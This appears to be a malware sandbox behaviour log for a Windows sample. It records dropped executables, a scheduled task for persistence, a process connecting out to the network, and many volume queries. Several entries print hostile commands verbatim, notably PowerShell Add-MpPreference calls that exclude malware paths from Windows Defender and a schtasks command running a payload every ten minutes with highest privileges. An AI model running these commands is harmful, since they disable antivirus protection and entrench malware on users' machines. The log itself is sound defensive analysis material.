                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeProcess token adjusted: Debug
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeProcess token adjusted: Debug
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess token adjusted: Debug
                          Source: C:\Recovery\dllhost.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Recovery\dllhost.exeNetwork Connect: 172.67.203.2 80
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /fJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeQueries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformationJump to behavior
                          Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformationJump to behavior
                          Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
